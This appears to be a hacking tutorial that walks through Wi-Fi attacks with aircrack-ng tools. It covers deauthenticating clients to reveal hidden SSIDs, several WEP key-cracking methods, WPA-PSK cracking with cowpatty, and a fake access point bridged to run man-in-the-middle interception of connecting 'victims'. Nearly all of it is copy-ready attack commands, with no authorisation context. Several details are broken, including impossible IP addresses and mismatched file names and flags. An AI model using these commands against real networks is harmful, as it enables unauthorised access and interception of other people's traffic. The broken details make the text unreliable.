Wireless Attacks Part II
Reveal Hidden SSID’s using aireplay-ng
for this Attack to work you need an associated client on the network to deauth. this works onall encryption levels and even non encrypted AP’s
Make sure to open up airodump-ng on the channel of your victim to watch for the SSID to be revealed in real time
aireplay-ng -0 5 -a B:S:S:I:D mon0
Thats all there is to it, when the client reconnects to the AP you will
see the hidden SSID revealed in airodump-ng
——————————————————————————————————————–
Decrypt WEP and WPA packets
“NOTE” you must already have the network key or also called password to use this tool..
airdecap-ng -w password_key capture-01.cap
Using Tshark with the commands below, WEP & WPA have 2 different commands to remember.
For WEP Encrypted Files:
tshark -r capture-01-dec.o1cap -c 10
For WPA encrypted files:
airdecap-ng -p password_key capture-01.cap -e linksys
——————————————————————————————————————–
Clientless WEP Attack using Fragmentation method
Step 1: aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0
Step 2: aireplay-ng -5 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0
Step 3: Use this packet? type “Y” for yes but make sure the size is over 68 from experience.
Step 4: Type ls to show the files in your root directory and copy the whole file that ends in.xor
Step 5: packetforge-ng -0 -a B:S:S:I:D -h Y:O:U:R:M:A:C -k 255.255.255.255 -l 255.255.255.255 -y fragment-001-002.xor -w arp-request
Step 6: airodump-ng -c 11 –bssid B:S:S:I:D –ivs -w capture mon0
Step 7: aireplay-ng -2 -r arp-request mon0
Step 8: Use this packet? type “Y” for yes but make sure the size is 68 or over from experience.
Step 9: aircrack-ng -n 64 -b B:S:S:I:D *.ivs
This is assuming your attacking a 64bit encrypted network if not just to the regular aircrack-ng command.
——————————————————————————————————————–
Crack WEP using ChopChop method
-1 is for Fake Au hentication
-a is for your Access Point’s Mac Address
0 is for reassociation timing in seconds
-h is for your cards Mac Address or from an Associated client on the network
-e The ESSID name of your AP you are attacking
-4 is for ChopChop Attack method
Step 1:
airodump-ng -c 11 -w dump_file -i mon0
Step 2:
aireplay-ng -e linksys -1 0 -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0 I
t should now say Association successfull with a : )
Step 3:
aireplay-ng -4 -h Y:O:U:R:M:A:C -b B:S:S:I:D mon0
The destination Mac Address should not read FF:FF:FF:FF:FF “if it does do not continue untill it changes or the attack will not work” so keep typing “n” for no untill it is no longer FF:FF:FF:FF:FF
Step 4:
Now it should say “Saving plain text in replay_000-111-11122.cap copy the whole name of the.cap file
Step 5:
tcpdump -s 0 -n -e -r replay_000-111-11122.cap
Step 6:
packetforge-ng -0 -h Y:O:U:R:M:A:C -c C:L:I:E:N:T:S -a B:S:S:I:D -l 192.168.1.73842 -k192.108.123.6382 -y
replay_000-111-11122.xor -w arp-cap
-0 is for the Forged Arp packet
-h is for your Mac address
-c is for the Associated Clients Mac address
-a is for the Access Points Mac address
-l is to set the destination IP Address
-k is to set the source IP Address
-y means to read the PRGA from this file
-w means to write the packet to this pcap file
Step 7:
aireplay-ng -2 -r arp.cap mon0
Step 8:
Type “y” to use the data packet when it asks and from there your Data field on airodump-ng should start to rise dramaticaly
Step 9:
aircrack-ng -a 1 -x -0 dump_file-01.ivs dump_file is the one we wrote in step 1:
Step 10:
Then chose your target when asked and aircrack-ng will begin to run
——————————————————————————————————————–
WEP attack with a Client already connected to the Access Point
Step 1:
airodump-ng -c 11 -w wep -a mon0
-c is the channel which the target is transmitting on
-w is the Dump File prefix
-i means save only captured IV’s
mon0 is your monitor mode interface as always
step 2:
aireplay-ng -1 0 -e linksys -a B:S:S:I:D -h Y:O:U:R:M:A:C mon0
-1 is for Fake Authentication
0 is for reassociation timing in seconds
-e is for the target network ESSID or as we know it as the AP’s actual name given by the user “Example” FREE WIFI
-a is for your Access Points Mac Address
-h is for your own Wireless cards Mac Address
Step 2:
aireplay-ng -3 -b B:S:S:I:D -h Y:O:U:R:M:A:C mon0
-3 is for Arp request Replay Attack
-b is for your Access Points Mac Address
-h is for your source Mac Address “Either a Client or from a Fake Association”
Step 3:
aircrack-ng -a 1 -0 -n 128 wep-01.ivs
The 128 is assuming you are cracking a 104bit encrypted network and the file wep-01.ivs was created from the name given in step 1:
-a is for force Attack mode
1 is for static WEP
-0 is to apply nice colors to the aircrack-ng terminal window when opened up
-n is to specify the length for the key 128 for (104bit WEP)
Set up a Fake AP honey pot using Brctrl to get client to connect and run a MITM Attack
- Bring up eth0 in backtrack
ifconfig eth0 up
2. Bring up an access point with SSID of what ever name you are trying to clone. for this tutorial I chose linksys but you can make your own.
mitm is your bridged interface name “you can name it what ever you like for this Attack”
at0 is the new tap interface created by your wireless card & will be named by your card automatically
dhclient3 is your dhcp client which will help bridge your internet to the victim.
ifconfig wlan0mon up
airmon-ng start wlan0mon
iwconfig wlan0mon channel 1
airbase-ng -ssid linksys mon0
Bridge the interfaces
Open up another terminal window to run these commands
ifconfig at0 up
brctl addbr mitm
brctl show ————-> This will show you have notr added the bridge yet so we’ll do that next
brctl addif mitm eth0
brctl addif mitm at0
ifconfig eth 0 0.0.0.0 up Vivek uses the IP address of both using all zero’s but you can try others if you like.
ifconfig at0 0.0.0.0 up
If you do ifconfig, you’ll see a new bridge, mitm. Bring up the interface:
ifconfig mitm
dhclient3 mitm
Now connect a client to the new AP and make sure you are able to surf the web now using the at0
interface & mitm bridge giving dhcp. If you are the options are endless ; )
Should your eth0 interface loose connection to the internet kill the mitm bridge using the command below,
make sure to stop it first as well as the at0 interface.
brctl delbr mitm brctl stands for bridge controll and delbr stands for delete bridge
———————————————————————————————————————————————————————————————————————————————————————————-
WPA/WPA2 – PSK Cracking using Rainbowtables with Cowpatty
What do the switches in these commands really mean?
-c The channel the AP is located on
–bssid The Mac Address of the AP you are attacking
-0 Specifies to aireplay-ng that it will be a Deauth Atatck, “thats a zero by the way”
-c after aireplay-ng command specifies the client connected to the AP which you are attacking
./cowpatty starts running cowpatty within Backtrack
-r = specifies the capture file you will be cracking using Cowpatty
-d The directory of your RainBow Table you will be using for the attack. basically the location on your hard disk.
Step 1:
airodump-ng -c 11 –bssid B:S:S:I:D -w LINKSYS mon0
Step 2:
aireplay-ng -0 1 -a B:S:S:I:D -c C:L:I:E:N:T mon0
you can increase the 1 to a 5 or more depending how many times you want to deauth the client
Step 3:
./cowpatty or just open up Cowpatty from your start menu
Step 4:
cowpatty -r LINKSYS -01.cap -d /root/Desktop/LINKSYS.wpa -s LINKSYS
————————————————————————————————
Test a capture file to see it’s integrity
Open pyrit or cd into the pyrit directory & type the command in below replacing output-01.cap with your own capture file.
pyrit -r output-01.cap analyze
